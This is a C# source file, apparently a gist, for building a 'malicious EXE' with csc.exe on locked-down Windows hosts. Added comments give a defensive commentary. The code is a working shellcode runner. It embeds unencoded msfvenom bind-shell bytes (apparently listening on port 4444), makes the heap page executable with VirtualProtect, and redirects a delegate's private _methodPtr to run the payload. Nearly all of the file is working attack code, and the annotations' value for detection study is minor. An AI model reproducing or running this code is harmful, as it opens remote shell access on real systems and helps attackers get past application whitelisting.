Use .NET csc.exe to create a malicious EXE on locked down systems
using System; | |
using System.Reflection; | |
using System.Runtime.InteropServices; | |
namespace ExecASMHardcoded | |
{ | |
// Proof-of-concept shellcode runner (the gist title says it is meant to be built with
// csc.exe on a locked-down host). It never calls VirtualAlloc/WriteProcessMemory/
// CreateThread: the payload sits in an ordinary managed byte[] that is pinned, made
// executable with VirtualProtect, and entered by rewriting a delegate's private method
// pointer via reflection. From a defensive view the visible, static signals are an
// unencoded payload blob in the image, a reflection lookup of Delegate._methodPtr, and a
// VirtualProtect(..., 0x40) (PAGE_EXECUTE_READWRITE) call against a GC-heap page.
class Program
{
    // P/Invoke of kernel32!VirtualProtect. SetLastError is requested, but the caller in
    // Main discards the bool result and never reads Marshal.GetLastWin32Error().
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, uint flNewProtect, out uint lpflOldProtect);

    // Delegate shape used to call into the byte array: one uint argument, uint return.
    // Nothing here checks that the native side actually honours this signature.
    public delegate uint Ret1ArgDelegate(uint address);

    // Dummy target so that a delegate instance can be constructed; once _methodPtr is
    // overwritten in Main, del(n) no longer reaches this body.
    static uint PlaceHolder1(uint arg1) { return 0; }

    // Raw x86 payload. Per the author's comment below it is msfvenom windows/shell_bind_tcp
    // with no encoder (-e none), so the bytes are a constant, signature-friendly blob.
    // The "0x02,0x00,0x11,0x5c" run pushed partway through looks like a sockaddr_in
    // (AF_INET, port 0x115c = 4444, the msfvenom default), so a new listening TCP socket
    // on 4444 owned by this process would be the runtime indicator to expect.
    // NOTE(review): the bytes were not disassembled here; treat the port reading as
    // likely, not verified.
    public static byte[] asmBytes = new byte[]
    {
        //msfvenom -p windows/shell_bind_tcp -e none | sed -e ‘s/\"//ig’ | sed -e ‘s/+//ig’ | sed -e ‘s/\\x/,0x/ig’
        0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,
        0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,
        0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,
        0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,
        0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,
        0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,
        0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,
        0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
        0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,
        0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,
        0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,
        0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,
        0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,
        0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x89,0xc7,0x31,
        0xdb,0x53,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,
        0xc2,0xdb,0x37,0x67,0xff,0xd5,0x53,0x57,0x68,0xb7,0xe9,0x38,0xff,0xff,
        0xd5,0x53,0x53,0x57,0x68,0x74,0xec,0x3b,0xe1,0xff,0xd5,0x57,0x89,0xc7,
        0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x68,0x63,0x6d,0x64,0x00,0x89,0xe3,
        0x57,0x57,0x57,0x31,0xf6,0x6a,0x12,0x59,0x56,0xe2,0xfd,0x66,0xc7,0x44,
        0x24,0x3c,0x01,0x01,0x8d,0x44,0x24,0x10,0xc6,0x00,0x44,0x54,0x50,0x56,
        0x56,0x56,0x46,0x56,0x4e,0x56,0x56,0x53,0x56,0x68,0x79,0xcc,0x3f,0x86,
        0xff,0xd5,0x89,0xe0,0x4e,0x56,0x46,0xff,0x30,0x68,0x08,0x87,0x1d,0x60,
        0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
        0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,
        0x6a,0x00,0x53,0xff,0xd5,
    };

    // 'unsafe' is required for the fixed/pointer use below (build with /unsafe), which is
    // itself an unusual flag to see on a small console tool.
    unsafe static void Main(string[] args)
    {
        // Pin the managed array so its address is stable inside this block; the GC is free
        // to move it again once the fixed scope ends.
        fixed (byte* startAddress = &asmBytes[0]) // Take the address of our x86 code
        {
            // Get the FieldInfo for "_methodPtr" -- a private, undocumented CLR-internal
            // field of System.Delegate. GetField returns null when the running runtime has
            // no field by that name, in which case SetValue below throws
            // NullReferenceException.
            Type delType = typeof(Delegate);
            FieldInfo _methodPtr = delType.GetField("_methodPtr", BindingFlags.NonPublic |
            BindingFlags.Instance);
            // Set our delegate to our x86 code: after this, the delegate's call target is
            // the pinned array rather than PlaceHolder1.
            Ret1ArgDelegate del = new Ret1ArgDelegate(PlaceHolder1);
            _methodPtr.SetValue(del, (IntPtr) startAddress);
            //Disable protection: 0x40 is PAGE_EXECUTE_READWRITE, applied to the heap page(s)
            // holding asmBytes. The bool result is ignored, so a refused protection change
            // (e.g. under a DEP/ACG mitigation policy) is not noticed until the call faults.
            uint outOldProtection;
            VirtualProtect((IntPtr) startAddress, (uint) asmBytes.Length, 0x40, out outOldProtection);
            // Enjoy -- transfers control into asmBytes with n as the single argument.
            uint n = (uint)0x00000001;
            n = del(n);
            // Prints whatever the payload returned (presumably the value left in EAX), as hex.
            Console.WriteLine("{0:x}", n);
            // Keeps the process -- and anything the payload started inside it -- alive until
            // a key is pressed.
            Console.ReadKey();
        }
    }
}
} |